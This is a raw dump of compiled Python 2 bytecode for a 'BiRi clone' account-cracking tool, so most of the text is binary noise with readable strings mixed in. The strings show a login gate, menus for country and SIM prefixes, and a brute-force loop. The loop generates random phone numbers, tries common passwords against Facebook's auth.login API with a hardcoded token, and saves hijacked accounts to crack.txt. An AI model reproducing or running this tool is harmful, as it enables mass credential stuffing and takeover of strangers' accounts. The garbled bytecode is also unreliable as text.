\x1b[1;94m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;95m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\x1b[1;93m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m 
\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\n s\x08\x00\x00\x00birib@b@c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sk\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHt\x03\x00d\x02\x00\x83\x01\x00}\x00\x00|\x00\x00t\x04\x00k\x02\x00r4\x00t\x05\x00\x83\x00\x00\x01n3\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x03\x00|\x00\x00\x17d\x04\x00\x17GHt\x06\x00j\x07\x00d\x05\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00NR(\x00\x00\x00s\x17\x00\x00\x00\x1b[1;97mUSERNAME TOOL : s\x17\x00\x00\x00\x1b[1;93mUSERNAME TOOL : s\x16\x00\x00\x00 [\x1b[1;91mWRONG\x1b[1;95m]i\x01\x00\x00\x00(\t\x00\x00\x00R\x06\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00logot\t\x00\x00\x00raw_inputt\x04\x00\x00\x00cusrt\x01\x00\x00\x00pR\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x01\x00\x00\x00u(\x01\x00\x00\x00t\x03\x00\x00\x00usr(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R.\x00\x00\x00\xb0\x00\x00\x00s\x14\x00\x00\x00\x00\x01\r\x01\x05\x01\x0c\x01\x0c\x01\n\x02\r\x01\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00su\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHt\x03\x00d\x03\x00\x83\x01\x00}\x00\x00|\x00\x00t\x04\x00k\x02\x00r9\x00t\x05\x00\x83\x00\x00\x01n8\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x04\x00GHd\x05\x00|\x00\x00\x17d\x06\x00\x17GHt\x06\x00j\x07\x00d\x07\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01d\x00\x00S(\x08\x00\x00\x00NR(\x00\x00\x00s7\x00\x00\x00\x1b[1;91mUSERNAME TOOL : birib@b@ [\x1b[1;92mCORRECT\x1b[1;97m]s\x17\x00\x00\x00\x1b[1;96mPASSWORD TOOL : s7\x00\x00\x00\x1b[1;92mUSERNAME TOOL : b@b@biri [\x1b[1;92mCORRECT\x1b[1;97m]s\x17\x00\x00\x00\x1b[1;91mPASSWORD TOOL : s\x16\x00\x00\x00 [\x1b[1;91mWRONG\x1b[1;97m]i\x01\x00\x00\x00(\t\x00\x00\x00R\x06\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00t\x04\x00\x00\x00cpwdR 
\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R-\x00\x00\x00(\x01\x00\x00\x00t\x03\x00\x00\x00pwd(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R-\x00\x00\x00\xbc\x00\x00\x00s\x18\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x02\r\x01\x05\x01\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s4\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHd\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR(\x00\x00\x00s7\x00\x00\x00\x1b[1;93mUSERNAME TOOL : birib@b@ [\x1b[1;92mCORRECT\x1b[1;97m]s7\x00\x00\x00\x1b[1;96mPASSWORD TOOL : birib@b@ [\x1b[1;92mCORRECT\x1b[1;97m]i\x01\x00\x00\x00(\x06\x00\x00\x00R\x06\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x04\x00\x00\x00menu(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R \x00\x00\x00\xcb\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\x05\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s;\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHt\x03\x00d\x02\x00\x83\x01\x00\x01t\x03\x00d\x03\x00\x83\x01\x00\x01t\x03\x00d\x04\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR(\x00\x00\x00s>\x00\x00\x00 \x1b[1;97m[\x1b[1;92m01\x1b[1;93m] Start Crack Random Number Countrys)\x00\x00\x00 \x1b[1;97m[\x1b[1;92m02\x1b[1;95m] Update Toolss!\x00\x00\x00 \x1b[1;97m[\x1b[1;92m00\x1b[1;96m] 
Exit(\x05\x00\x00\x00R\x06\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R"\x00\x00\x00t\x03\x00\x00\x00avs(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R2\x00\x00\x00\xd5\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\r\x01\x05\x01\n\x01\n\x01\n\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s$\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xe1\x01|\x00\x00d\x04\x00k\x02\x00s?\x00|\x00\x00d\x05\x00k\x02\x00r7\x01t\x02\x00j\x03\x00d\x06\x00\x83\x01\x00\x01t\x04\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHd\x10\x00GHd\x08\x00GHd\x11\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x18\x00GHd\x08\x00GHyU\x00t\x00\x00d\x19\x00\x83\x01\x00\x89\x03\x00t\x00\x00d\x1a\x00\x83\x01\x00\x89\x04\x00d\x1b\x00}\x01\x00x0\x00t\x05\x00|\x01\x00d\x1c\x00\x83\x02\x00j\x06\x00\x83\x00\x00D]\x19\x00}\x02\x00t\x07\x00j\x08\x00|\x02\x00j\t\x00\x83\x00\x00\x83\x01\x00\x01q\xec\x00WWq\x08\x02\x04t\n\x00k\n\x00r3\x01\x01\x01\x01d\x1d\x00GHt\x00\x00d\x1e\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01q\x08\x02Xn\xd1\x00|\x00\x00d\x1f\x00k\x02\x00sO\x01|\x00\x00d 
\x00k\x02\x00r\xda\x01t\x02\x00j\x03\x00d\x06\x00\x83\x01\x00\x01t\x0c\x00GHt\r\x00d!\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d"\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d#\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d$\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d%\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d&\x00\x83\x01\x00\x01t\x02\x00j\x03\x00d\x06\x00\x83\x01\x00\x01t\r\x00d\'\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d(\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01n.\x00|\x00\x00d)\x00k\x02\x00s\xf2\x01|\x00\x00d*\x00k\x02\x00r\xfc\x01t\x10\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d+\x00GHd,\x00GHd-\x00GHt\x00\x00d.\x00\x83\x01\x00\x89\x00\x00t\x00\x00d/\x00\x83\x01\x00\x89\x01\x00t\x00\x00d0\x00\x83\x01\x00\x89\x02\x00d+\x00GHt\x11\x00t\x12\x00t\x07\x00\x83\x01\x00\x83\x01\x00}\x03\x00t\r\x00d1\x00|\x03\x00\x17\x83\x01\x00\x01t\x0e\x00j\x0f\x00d2\x00\x83\x01\x00\x01t\r\x00d3\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d2\x00\x83\x01\x00\x01t\r\x00d4\x00\x83\x01\x00\x01t\x0e\x00j\x0f\x00d2\x00\x83\x01\x00\x01d+\x00GH\x87\x00\x00\x87\x01\x00\x87\x02\x00\x87\x03\x00\x87\x04\x00f\x05\x00d5\x00\x86\x00\x00}\x04\x00t\x13\x00d6\x00\x83\x01\x00}\x05\x00|\x05\x00j\x14\x00|\x04\x00t\x07\x00\x83\x02\x00\x01d+\x00GHd7\x00GHd8\x00t\x11\x00t\x12\x00t\x15\x00\x83\x01\x00\x83\x01\x00\x17d9\x00\x17t\x11\x00t\x12\x00t\x16\x00\x83\x01\x00\x83\x01\x00\x17GHd:\x00GHt\x00\x00d;\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01d\x00\x00S(<\x00\x00\x00Ns4\x00\x00\x00\n[\x1b[1;93m?\x1b[1;93m]\x1b[1;96m Choose an Option : \x1b[1;95mR\x0b\x00\x00\x00s\x15\x00\x00\x00[!] 
Fill In Correctlyt\x01\x00\x00\x001t\x02\x00\x00\x0001R(\x00\x00\x00s2\x00\x00\x00\x1b[1;92m\xf0\x9f\x91\xacRandom sim Number Clone All Country\xf0\x9f\x91\xacs2\x00\x00\x00\x1b[1;91m-------------------------------------------s3\x00\x00\x00\x1b[1;93m\xf0\x9f\x92\x9aCHOOSE ANY COUNTRY CODE NUMBER\xf0\x9f\x92\x9a : s2\x00\x00\x00\x1b[1;95m\xf0\x9f\x92\x9aBANGLADESH\xf0\x9f\x92\x9a Country code : +880 s8\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\x9ePAKISTAN\xf0\x9f\x92\x9e Country code : +92 s5\x00\x00\x00\x1b[1;97m\xf0\x9f\x92\x97INDIA\xf0\x9f\x90\xae\xf0\x9f\x92\x97 Country code : +91 s6\x00\x00\x00\x1b[1;92m\xf0\x9f\xa5\xb0SOUDIA\xf0\x9f\xa5\xb0 County code : +966 s2\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\xb5USA\xf0\x9f\x92\xb5 County code : +1 s3\x00\x00\x00\x1b[1;93m\xf0\x9f\x91\x98INDONESIA\xf0\x9f\x91\x98 County code : +1 s4\x00\x00\x00\x1b[1;95m\xf0\x9f\x91\x94UK\xf0\x9f\x91\x94 County code : +44 s-\x00\x00\x00\x1b[1;93m\xf0\x9f\x92\x99CHOOSE ANY SIM CODE NUMBER\xf0\x9f\x92\x9a :s<\x00\x00\x00\x1b[1;95m\xf0\x9f\x92\x9dBANGLADESH\xf0\x9f\x92\x9dSIM code:(175,165,191,192,193,194,)s;\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\x97PAKISTAN\xf0\x9f\x92\x97SIM code:( 313,303,345,333,321,303,)s8\x00\x00\x00\x1b[1;97m\xf0\x9f\x92\xa5INDIA\xf0\x9f\x92\xa5SIM code:( 954,897,967,937,700,727,)s:\x00\x00\x00\x1b[1;92m\xf0\x9f\x92\x91SOUDIA\xf0\x9f\x92\x91SIM code :( 50,51,52,53,54,55,56,57,)s8\x00\x00\x00\x1b[1;96m\xf0\x9f\x92\x9bUSA\xf0\x9f\x92\x9b SIM code :( 786,815,315,256,401,718,)s9\x00\x00\x00\x1b[1;93m\xf0\x9f\x92\x98INDONESIA\xf0\x9f\x92\x98SIM code :( 786,815,315,256,401,)s9\x00\x00\x00\x1b[1;95m\xf0\x9f\x92\x8cUK\xf0\x9f\x92\x8cSIM code:( 737,706,748,783,739,759,790,)s&\x00\x00\x00\x1b[1;96mENTER ANY Country CODE NUMBER: s"\x00\x00\x00\x1b[1;95mENTER ANY SIM CODE HERE : s\x04\x00\x00\x00.txtt\x01\x00\x00\x00rs\x12\x00\x00\x00[!] 
File Not Founds\t\x00\x00\x00\n[ Back ]t\x01\x00\x00\x002t\x02\x00\x00\x0002s\x1f\x00\x00\x00\x1b[1;93mSedang Update Tools ....i\x02\x00\x00\x00s\x1e\x00\x00\x00pip2 install --upgrade anggaxds.\x00\x00\x00pip2 install request && pip2 install mechanizes\x16\x00\x00\x00git pull origin mastert\x07\x00\x00\x00anggaxds\x1f\x00\x00\x00\n\n\n\x1b[1;93mTOOLS SUDAH DI UPDATEi\x01\x00\x00\x00t\x01\x00\x00\x000t\x02\x00\x00\x0000s9\x00\x00\x00\x1b[1;91m--------------------------------------------------s.\x00\x00\x00\x1b[1;92m \xf0\x9f\x92\x9e7 digit automatic BiRi clone\xf0\x9f\x92\x9es?\x00\x00\x00\x1b[1;95m Example Password \x1b[1;93m : \x1b[1;91m786786,123456,000786s2\x00\x00\x00\x1b[1;92m+ \x1b[1;93mENTER YOUR FAVOURITE Password 1 : s2\x00\x00\x00\x1b[1;93m+ \x1b[1;91mENTER YOUR FAVOURITE Password 2 : s2\x00\x00\x00\x1b[1;96m+ \x1b[1;96mENTER YOUR FAVOURITE Password 3 : s)\x00\x00\x00\x1b[1;97m[\x1b[1;92m+\x1b[1;97m] Total Numbers : g\x00\x00\x00\x00\x00\x00\xe0?s9\x00\x00\x00[\x1b[1;92m\xe2\x9c\x93\x1b[1;95m] Cracking Process Has Been Started ...s9\x00\x00\x00[\x1b[1;91m!\x1b[1;93m] To Stop Process Press CTRL Then Press 
zc\x01\x00\x00\x00\n\x00\x00\x00\x05\x00\x00\x00\x13\x00\x00\x00s%\x05\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00Xy\xec\x04\x88\x00\x00}\x02\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\x02\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r\xe9\x00d\x07\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x02\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x02\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n-\x04d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00rh\x01d\x0f\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x02\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x11\x00\x17|\x02\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x02\x00\x17\x83\x01\x00\x01n\xae\x03\x88\x01\x00}\x07\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\x07\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r#\x02d\x12\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x07\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x07\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01n\xf3\x02d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00r\xa2\x02d\x13\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x07\x00\x17GHt\x04\x00d\t\x00d\n\x00\
x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x14\x00\x17|\x07\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x07\x00\x17\x83\x01\x00\x01nt\x02\x88\x02\x00}\x08\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\x08\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r]\x03d\x15\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x08\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x08\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x08\x00\x17\x83\x01\x00\x01n\xb9\x01d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00r\xdc\x03d\x16\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\x08\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x17\x00\x17|\x08\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\x08\x00\x17\x83\x01\x00\x01n:\x01|\x01\x00}\t\x00t\x03\x00j\x04\x00d\x02\x00d\x03\x00\x17\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x04\x00\x17|\t\x00\x17d\x05\x00\x17\x83\x01\x00}\x03\x00t\x05\x00j\x06\x00|\x03\x00\x83\x01\x00}\x04\x00d\x06\x00|\x04\x00k\x06\x00r\x97\x04d\x18\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\t\x00\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x05\x00|\x05\x00j\x07\x00d\x0b\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x05\x00j\x08\x00\x83\x00\x00\x01t\t\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\t\x00\x17\x83\x01\x00\x01n\x7f\x00d\r\x00|\x04\x00d\x0e\x00\x19k\x06\x00r\x16\x05d\x19\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x08\x00\x17|\t\x00
\x17GHt\x04\x00d\t\x00d\n\x00\x83\x02\x00}\x06\x00|\x06\x00j\x07\x00d\x10\x00\x88\x03\x00\x17\x88\x04\x00\x17|\x01\x00\x17d\x1a\x00\x17|\t\x00\x17d\x0c\x00\x17\x83\x01\x00\x01|\x06\x00j\x08\x00\x83\x00\x00\x01t\x0b\x00j\n\x00\x88\x03\x00|\x01\x00\x17|\t\x00\x17\x83\x01\x00\x01n\x00\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00Nt\x04\x00\x00\x00biris\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=s\x0c\x00\x00\x00[Successful]s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efmt\x0c\x00\x00\x00access_tokens\'\x00\x00\x00\x1b[1;97m[\x1b[1;92mBiRi-Successful\x1b[1;92m] s\x05\x00\x00\x00 \xe2\x97\x90 s\x0e\x00\x00\x00biri/crack.txtR\x00\x00\x00\x00s\x12\x00\x00\x00[BiRi-Successful] s\x01\x00\x00\x00\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs#\x00\x00\x00\x1b[1;97m[\x1b[1;93m[BiRi-Lock]\x1b[1;93m] s\x0c\x00\x00\x00[BiRi-Lock] s\x06\x00\x00\x00 \xf0\x9f\x92\x8f s&\x00\x00\x00\x1b[1;97m[\x1b[1;92BiRi-Successful\x1b[1;97m] s#\x00\x00\x00\x1b[1;97m[\x1b[1;91m[BiRi-Lock]\x1b[1;91m] s\x06\x00\x00\x00 \xf0\x9f\x92\x9e s\'\x00\x00\x00\x1b[1;97m[\x1b[1;92mBiRi-Successful\x1b[1;91m] s#\x00\x00\x00\x1b[1;97m[\x1b[1;96m[BiRi-Lock]\x1b[1;96m] s\x06\x00\x00\x00 \xf0\x9f\x92\x97 s\'\x00\x00\x00\x1b[1;97m[\x1b[1;92mBiRi-Successful\x1b[1;97m] s#\x00\x00\x00\x1b[1;92m[\x1b[1;92m[BiRi-Lock]\x1b[1;92m] s\x06\x00\x00\x00 \xf0\x9f\x9a\xac 
(\x0c\x00\x00\x00R\x06\x00\x00\x00t\x05\x00\x00\x00mkdirt\x07\x00\x00\x00OSErrort\x02\x00\x00\x00brt\x04\x00\x00\x00opent\x04\x00\x00\x00jsont\x04\x00\x00\x00loadR\x1b\x00\x00\x00t\x05\x00\x00\x00closet\x03\x00\x00\x00okst\x06\x00\x00\x00appendt\x03\x00\x00\x00cpb(\n\x00\x00\x00t\x03\x00\x00\x00argt\x04\x00\x00\x00usert\x05\x00\x00\x00pass1t\x04\x00\x00\x00datat\x01\x00\x00\x00qt\x03\x00\x00\x00okbt\x03\x00\x00\x00cpst\x05\x00\x00\x00pass2t\x05\x00\x00\x00pass3t\x05\x00\x00\x00pass4(\x05\x00\x00\x00t\n\x00\x00\x00anggaxdpw1t\n\x00\x00\x00anggaxdpw2t\n\x00\x00\x00anggaxdpw3t\x01\x00\x00\x00ct\x01\x00\x00\x00k(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x04\x00\x00\x00main+\x01\x00\x00s\x88\x00\x00\x00\x00\x02\x06\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x06\x01+\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01%\x01\n\x01\x18\x02\x10\x01\x19\x01\x0f\x01%\x01\n\x01\x18\x02\x06\x01+\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01%\x01\n\x01\x18\x02\x10\x01\x19\x01\x0f\x01%\x01\n\x01\x18\x02\x06\x01+\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01%\x01\n\x01\x18\x02\x10\x01\x19\x01\x0f\x01%\x01\n\x01\x18\x02\x06\x01+\x01\x0f\x01\x0c\x01\x19\x01\x0f\x01%\x01\n\x01\x18\x02\x10\x01\x19\x01\x0f\x01%\x01\n\x01\x1c\x07\x03\x01i\x1e\x00\x00\x00s9\x00\x00\x00\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] Process Has Been Completed ...sO\x00\x00\x00[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] Total \x1b[1;92mSuccessfuly\x1b[1;97m/\x1b[1;93mCheckpoint\x1b[1;97m : t\x01\x00\x00\x00/sE\x00\x00\x00[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] Cracking Accounts Has Been Saved : biri/crack.txts+\x00\x00\x00\n\x1b[1;97m[\x1b[1;97mPress Enter Go 
Back\x1b[1;97m](\x17\x00\x00\x00R+\x00\x00\x00R3\x00\x00\x00R\x06\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00RB\x00\x00\x00t\t\x00\x00\x00readlinest\x02\x00\x00\x00idRG\x00\x00\x00t\x05\x00\x00\x00stript\x07\x00\x00\x00IOErrorR2\x00\x00\x00t\x06\x00\x00\x00logoxdR\'\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\t\x00\x00\x00R\x19\x00\x00\x00R\x10\x00\x00\x00R\x01\x00\x00\x00t\x03\x00\x00\x00mapRF\x00\x00\x00RH\x00\x00\x00(\x06\x00\x00\x00R9\x00\x00\x00t\x06\x00\x00\x00idlistt\x04\x00\x00\x00linet\x03\x00\x00\x00xxxRX\x00\x00\x00R-\x00\x00\x00(\x00\x00\x00\x00(\x05\x00\x00\x00RS\x00\x00\x00RT\x00\x00\x00RU\x00\x00\x00RV\x00\x00\x00RW\x00\x00\x00s\x06\x00\x00\x00<THBD>R3\x00\x00\x00\xdd\x00\x00\x00s\x9c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x18\x01\r\x01\x05\x01\x05\x01\x05\x02\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x02\x05\x02\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x03\x01\x0c\x02\x0c\x04\x06\x01\x1c\x01\x1b\x01\r\x01\x05\x01\n\x01\x0e\x01\x18\x01\r\x01\x05\x01\n\x01\r\x01\r\x01\r\x01\r\x01\r\x01\r\x01\n\x01\r\x01\n\x01\x18\x01\n\x02\x05\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x05\x01\x12\x01\x0e\x01\r\x01\n\x01\r\x01\n\x01\r\x01\x05\x01\x1bT\x0c\x01\x10\x01\x05\x01\x05\x01)\x01\x05\x02\n\x01t\x08\x00\x00\x00__main__(\x02\x00\x00\x00s\n\x00\x00\x00User-Agentsx\x00\x00\x00Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36(\x02\x00\x00\x00s\n\x00\x00\x00user-agents\x1d\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/64.64.121.87;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/redmi;FBBD/redmi;FBPN/com.facebook.katana;FBDV/Redmi 
